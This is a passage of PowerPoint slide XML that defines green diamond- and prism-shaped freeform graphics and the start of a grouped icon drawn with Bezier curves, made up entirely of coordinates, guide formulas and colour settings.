                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="931" y="1497"/>
                  <a:ext cx="904" cy="244"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 904"/>
                    <a:gd name="T1" fmla="*/ 121 h 244"/>
                    <a:gd name="T2" fmla="*/ 453 w 904"/>
                    <a:gd name="T3" fmla="*/ 0 h 244"/>
                    <a:gd name="T4" fmla="*/ 904 w 904"/>
                    <a:gd name="T5" fmla="*/ 121 h 244"/>
                    <a:gd name="T6" fmla="*/ 453 w 904"/>
                    <a:gd name="T7" fmla="*/ 244 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 904"/>
                    <a:gd name="T9" fmla="*/ 121 h 2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04" h="244">
                      <a:moveTo>
                        <a:pt x="0" y="121"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="453" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="904" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="244"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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31" name="Freeform 720"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1384" y="1400"/>
                  <a:ext cx="451" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 97 h 218"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 0 h 218"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 123 h 218"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 218 h 218"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 97 h 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1" h="218">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="218"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="006600"/>
                </a:solidFill>
                <a:ln w="6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="0099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32" name="Freeform 721"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="931" y="1400"/>
                  <a:ext cx="453" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 97 h 218"/>
                    <a:gd name="T2" fmla="*/ 453 w 453"/>
                    <a:gd name="T3" fmla="*/ 0 h 218"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 123 h 218"/>
                    <a:gd name="T6" fmla="*/ 0 w 453"/>
                    <a:gd name="T7" fmla="*/ 218 h 218"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 97 h 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3" h="218">
                      <a:moveTo>
                        <a:pt x="453" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="453" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="218"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="006600"/>
                </a:solidFill>
                <a:ln w="6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="0099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Freeform 722"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1502"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180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2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="18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723"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1061" y="1493"/>
                  <a:ext cx="668" cy="179"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 179"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 179"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 101 h 179"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 179 h 179"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="179">
                      <a:moveTo>
                        <a:pt x="668" y="78"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="377" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668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724"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1481"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180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2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="18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36" name="Freeform 725"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1061" y="1471"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180">
                      <a:moveTo>
                        <a:pt x="668" y="78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80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668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37" name="Freeform 726"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1457"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180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2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="18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38" name="Freeform 727"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1061" y="1450"/>
                  <a:ext cx="668" cy="177"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 76 h 177"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 177"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 177 h 177"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 76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8" h="177">
                      <a:moveTo>
                        <a:pt x="668" y="76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77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668" y="7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39" name="Freeform 728"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1436"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180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2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="18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40" name="Freeform 729"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1061" y="1426"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180">
                      <a:moveTo>
                        <a:pt x="668" y="78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80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668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41" name="Freeform 730"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1415"/>
                  <a:ext cx="668" cy="179"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 179"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 179"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 101 h 179"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 179 h 179"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="179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1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="179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42" name="Freeform 731"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1061" y="1405"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180">
                      <a:moveTo>
                        <a:pt x="668" y="78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80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668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Freeform 732"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1391"/>
                  <a:ext cx="668" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 180"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 180"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 180"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 180 h 180"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="180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2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="18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44" name="Freeform 733"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1061" y="1384"/>
                  <a:ext cx="668" cy="177"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 76 h 177"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 177"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 177 h 177"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 76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8" h="177">
                      <a:moveTo>
                        <a:pt x="668" y="76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77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668" y="7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 734"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1056" y="1370"/>
                  <a:ext cx="668" cy="179"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 668"/>
                    <a:gd name="T1" fmla="*/ 78 h 179"/>
                    <a:gd name="T2" fmla="*/ 290 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 179"/>
                    <a:gd name="T4" fmla="*/ 668 w 668"/>
                    <a:gd name="T5" fmla="*/ 101 h 179"/>
                    <a:gd name="T6" fmla="*/ 380 w 668"/>
                    <a:gd name="T7" fmla="*/ 179 h 179"/>
                    <a:gd name="T8" fmla="*/ 0 w 668"/>
                    <a:gd name="T9" fmla="*/ 78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8" h="179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1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="179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46" name="Freeform 735"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1384" y="1523"/>
                  <a:ext cx="451" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 218 h 218"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 121 h 218"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 0 h 218"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 95 h 218"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 218 h 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1" h="218">
                      <a:moveTo>
                        <a:pt x="0" y="218"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="95"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="218"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:ln w="6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="0099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47" name="Freeform 736"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="931" y="1523"/>
                  <a:ext cx="453" cy="218"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 0 h 218"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 95 h 218"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 218 h 218"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 121 h 218"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 0 h 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3" h="218">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="95"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="218"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453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9900"/>
                </a:solidFill>
                <a:ln w="6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="0099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9" name="Group 737"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4706" y="2743"/>
                <a:ext cx="286" cy="218"/>
                <a:chOff x="1722" y="2589"/>
                <a:chExt cx="866" cy="661"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="504" name="Group 738"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2160" y="2589"/>
                  <a:ext cx="312" cy="532"/>
                  <a:chOff x="1924" y="1129"/>
                  <a:chExt cx="312" cy="532"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="525" name="Freeform 739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924" y="1216"/>
                    <a:ext cx="312" cy="245"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 235 w 237"/>
                      <a:gd name="T1" fmla="*/ 113 h 186"/>
                      <a:gd name="T2" fmla="*/ 235 w 237"/>
                      <a:gd name="T3" fmla="*/ 113 h 186"/>
                      <a:gd name="T4" fmla="*/ 225 w 237"/>
                      <a:gd name="T5" fmla="*/ 49 h 186"/>
                      <a:gd name="T6" fmla="*/ 199 w 237"/>
                      <a:gd name="T7" fmla="*/ 24 h 186"/>
                      <a:gd name="T8" fmla="*/ 156 w 237"/>
                      <a:gd name="T9" fmla="*/ 12 h 186"/>
                      <a:gd name="T10" fmla="*/ 116 w 237"/>
                      <a:gd name="T11" fmla="*/ 2 h 186"/>
                      <a:gd name="T12" fmla="*/ 87 w 237"/>
                      <a:gd name="T13" fmla="*/ 12 h 186"/>
                      <a:gd name="T14" fmla="*/ 73 w 237"/>
                      <a:gd name="T15" fmla="*/ 85 h 186"/>
                      <a:gd name="T16" fmla="*/ 73 w 237"/>
                      <a:gd name="T17" fmla="*/ 85 h 186"/>
                      <a:gd name="T18" fmla="*/ 72 w 237"/>
                      <a:gd name="T19" fmla="*/ 90 h 186"/>
                      <a:gd name="T20" fmla="*/ 21 w 237"/>
                      <a:gd name="T21" fmla="*/ 104 h 186"/>
                      <a:gd name="T22" fmla="*/ 26 w 237"/>
                      <a:gd name="T23" fmla="*/ 135 h 186"/>
                      <a:gd name="T24" fmla="*/ 80 w 237"/>
                      <a:gd name="T25" fmla="*/ 122 h 186"/>
                      <a:gd name="T26" fmla="*/ 80 w 237"/>
                      <a:gd name="T27" fmla="*/ 122 h 186"/>
                      <a:gd name="T28" fmla="*/ 86 w 237"/>
                      <a:gd name="T29" fmla="*/ 120 h 186"/>
                      <a:gd name="T30" fmla="*/ 99 w 237"/>
                      <a:gd name="T31" fmla="*/ 112 h 186"/>
                      <a:gd name="T32" fmla="*/ 104 w 237"/>
                      <a:gd name="T33" fmla="*/ 92 h 186"/>
                      <a:gd name="T34" fmla="*/ 104 w 237"/>
                      <a:gd name="T35" fmla="*/ 92 h 186"/>
                      <a:gd name="T36" fmla="*/ 110 w 237"/>
                      <a:gd name="T37" fmla="*/ 47 h 186"/>
                      <a:gd name="T38" fmla="*/ 109 w 237"/>
                      <a:gd name="T39" fmla="*/ 160 h 186"/>
                      <a:gd name="T40" fmla="*/ 119 w 237"/>
                      <a:gd name="T41" fmla="*/ 170 h 186"/>
                      <a:gd name="T42" fmla="*/ 169 w 237"/>
                      <a:gd name="T43" fmla="*/ 184 h 186"/>
                      <a:gd name="T44" fmla="*/ 196 w 237"/>
                      <a:gd name="T45" fmla="*/ 165 h 186"/>
                      <a:gd name="T46" fmla="*/ 196 w 237"/>
                      <a:gd name="T47" fmla="*/ 160 h 186"/>
                      <a:gd name="T48" fmla="*/ 216 w 237"/>
                      <a:gd name="T49" fmla="*/ 155 h 186"/>
                      <a:gd name="T50" fmla="*/ 219 w 237"/>
                      <a:gd name="T51" fmla="*/ 154 h 186"/>
                      <a:gd name="T52" fmla="*/ 232 w 237"/>
                      <a:gd name="T53" fmla="*/ 146 h 186"/>
                      <a:gd name="T54" fmla="*/ 237 w 237"/>
                      <a:gd name="T55" fmla="*/ 124 h 186"/>
                      <a:gd name="T56" fmla="*/ 235 w 237"/>
                      <a:gd name="T57" fmla="*/ 113 h 186"/>
                      <a:gd name="T58" fmla="*/ 193 w 237"/>
                      <a:gd name="T59" fmla="*/ 75 h 186"/>
                      <a:gd name="T60" fmla="*/ 194 w 237"/>
                      <a:gd name="T61" fmla="*/ 87 h 186"/>
                      <a:gd name="T62" fmla="*/ 200 w 237"/>
                      <a:gd name="T63" fmla="*/ 123 h 186"/>
                      <a:gd name="T64" fmla="*/ 196 w 237"/>
                      <a:gd name="T65" fmla="*/ 124 h 186"/>
                      <a:gd name="T66" fmla="*/ 194 w 237"/>
                      <a:gd name="T67" fmla="*/ 87 h 186"/>
                      <a:gd name="T68" fmla="*/ 193 w 237"/>
                      <a:gd name="T69" fmla="*/ 75 h 186"/>
                      <a:gd name="T70" fmla="*/ 192 w 237"/>
                      <a:gd name="T71" fmla="*/ 70 h 186"/>
                      <a:gd name="T72" fmla="*/ 193 w 237"/>
                      <a:gd name="T73" fmla="*/ 75 h 1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37" h="186">
                        <a:moveTo>
                          <a:pt x="235" y="113"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="84"/>
                          <a:pt x="226" y="57"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="223" y="32"/>
                          <a:pt x="207" y="26"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="9"/>
                          <a:pt x="125" y="3"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="90" y="4"/>
                          <a:pt x="87" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="14"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="29" y="102"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="108"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="118"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="65"/>
